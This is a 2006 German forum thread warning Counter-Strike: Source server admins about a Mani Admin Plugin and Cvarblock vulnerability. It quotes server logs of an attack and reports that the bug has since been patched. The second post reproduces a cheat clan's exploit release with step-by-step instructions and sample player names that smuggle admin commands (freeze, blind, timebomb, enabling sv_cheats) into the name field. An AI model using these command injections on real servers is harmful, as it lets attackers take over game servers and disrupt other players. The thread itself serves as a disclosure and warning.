mani plug mit cvarblock gefährlich

sbr2d2 · 8. Mai 2006

hi leute,ich möchte hier mal auf eine schwachstelle hinweisen.
wer auf seinem gs maniadmin-plug und cvarblock benutzt,
muss damit rechnen das irgendson "spinner" den server manipuliert.
das ganze funktioniert über ma_comands.
so kann es passieren,das einer mit folgenden namen joint.

Zitat

serverlog
"al;ma_cexec_all name b;ma_ban b<41><STEAM_ID_PENDING><>" connected, address "80.171.39.211:65347"

das resultat ist,das bei allen spielern der name auf " b " gesetzt wird,bzw nur bei einem,die anderen heissen dann b1 b2 b3 b4 usw.
dann wird der spieler mit dem namen b vom server gebant,bzw gekickt.

das funktioniert leider auch mit allen anderen ma_comands.

ob es an der mischung liegt,mani + cvarblock,kann ich noch nicht sagen.

möchte das auch nur als warnung posten.
übrigens muss der "spinner" der sich sowas ausdenkt,eine gültige steamid haben,mit der er joint.
diese kann man dann ja im nachhinein bannen.

im manilog sieht das dann so aus.

Zitat

M 05/06/0106 - 19:30:43: Log file [./cfg/mani_admin_plugin/mani_logs/M0506008.log] started for map [de_dust]
M 05/06/2006 - 19:35:34: CONSOLE : ma_cexec_all name b
M 05/06/2006 - 19:36:06: CONSOLE : ma_cexec_all name b
M 05/06/2006 - 19:36:06: CONSOLE : Banned (By Admin) [(1)b] [STEAM_0:0:xyzblabla] banid b 39 kick
M 05/06/2006 - 19:36:37: CONSOLE : ma_cexec_all name b
M 05/06/2006 - 19:37:40: CONSOLE : ma_cexec_all say IMANOOB(STEAM_0:0:andere id) Authenticated
M 05/06/2006 - 19:38:21: CONSOLE : ma_cexec_all name b
M 05/06/2006 - 19:38:49: CONSOLE : ma_cexec_all name b
M 05/06/2006 - 19:39:22: CONSOLE : ma_cexec_all name b
M 05/06/2006 - 19:44:34: CONSOLE : User attempted to change to mapname [test_speakers]
M 05/06/2006 - 19:45:16: CONSOLE : User attempted to change to mapname [test_speakers]

Alles anzeigen

man könnte nun meinen da hat jemand über das rconpw ma_comands ausgeführt,das serverlog gibt aber aufschluss.

gruss s.b.

edit:mittlerweile hab ich raus,das es sogar fertige plugins für den client gibt,welche die schwachstelle ausnutzen.

Andy28 · 10. Mai 2006

So zu diesem punkt cvarblock + mani sind gefährlich ....vor 3 Wochen habe ich im Mani Forum ein post gemacht Mani + cvarblock v5.0.2 waren zu der zeit hack bar... Durch verbreitung von dem Cheatclan mygot wurden da durch super viele server geshutet usw. Bei der version v5.0.2a wurde der bug halb gefixt und man konnte keine rcon Rechte mehr bekommen sondern nur noch durch Mani selbst verschiedene sachen ändern wie freezen oder Namen umändern. das Prob ist aber bereits gefixt und sollte keine Probleme mehr machen...

Auch Mani hatte sich nach wiederholtem anmailen und detailierten Anleitugnen endlich mal dazu bekannt es in seinem Forum zu posten http://www.mani-admin-plugin.c…ums/viewtopic.php?t=26343

Also besser informieren

Code

[Exploit] CSP, Euroblock, ZBlock, and Cvarblock servers - Comments: (161)
posted by [myg0t]SourceX on Friday, April 21 @ 5:12 PM


We had originally authorized BaDazz to release this on the MPC forums, but since Diddle viewed it as potential legal trouble, we are posting it here instead. The details of our original post are as follows:


This has been a semi-private exploit for some time now, and since many servers have been putting fixes in place for it, we at myg0t have decided to release it to the general public.


The exploit takes place in the Mani-Admin plugin console, which works on all (but patched) CSP, Euroblock, ZBlock, and Cvarblock servers, and it enables you to more or less play admin on the server of choice. You may find a short MPEG encoded movie of the exploit being used here: http://www.myg0t.com/mani_exploit-myg0t.tar.gz


Follow these steps to test out this exploit:


Step 1. Start CS:S with or without hacks.. doesnt really matter.
Step 2. Open the console and use a command such as: name "myg0t;ma_cexec_all name [myg0t]"
Step 3. After that, connect to an IP of the server you want. (see below)
Step 4. Join a team and select your player model. The command will be executed when the new round starts.


So, at the start of the next round, all player names will be changed with [myg0t] and part of their SteamID.
For step two, you have many commands to choose from, here are some fun ones for an exmaple:


name "myg0t;ma_freeze #CT" < or #T for terror team.. or #ALL for all players. freeze ppl
name "myg0t;sv_gravity 1"
name "myg0t;sv_cheats 1"
name "myg0t;ma_blind #CT" < or #T for terror team.. or #ALL for all players. blinding ppl
name "myg0t;ma_timebomb #all" < or #T for terror team.. or #ALL for all players. make ppl a timebomb
name "myg0t;ma_cexec_all fps max 0.99"


You can use your imagination and do almost anything you'd like, turn VAC2 secure servers into insecure, enable wireframe, wallhacks, hitboxes and more.


To spam things like skulls and purple shit like in past CS:S beta exploits, first enable sv_cheats, and then use the following config file:


"te 1000 breakmodel"
"te 1000 Dynamic Light"
"te 1000 Explosion"
"te 1000 Large Funnel"
"te 1000 Show Line"
"te 1000 Blood Stream"
"te 1000 Metal Sparks"
"te 1000 Armor Ricochet"
"te 1000 BeamRingPoint"
"te 1000 Bubbles"
"te 1000 Sprite"
"te 1000 Energy Splash"
"te 1000 Smoke"
"te 1000 breakmodel"
"te 1000 Dynamic Light"
"te 1000 Explosion"
"te 1000 Large Funnel"
"te 1000 Show Line"
"te 1000 Blood Stream"
"te 1000 Metal Sparks"
"te 1000 Armor Ricochet"
"te 1000 BeamRingPoint"
"te 1000 Bubbles"
"te 1000 Sprite"
"te 1000 Energy Splash"
"te 1000 Smoke"


This exploit has been tested in CS:S and DoD:S. Credits go out to daad from our forums for finding this and sharing it with us.

Alles anzeigen

mani plug mit cvarblock gefährlich

Jetzt mitmachen!

Teilen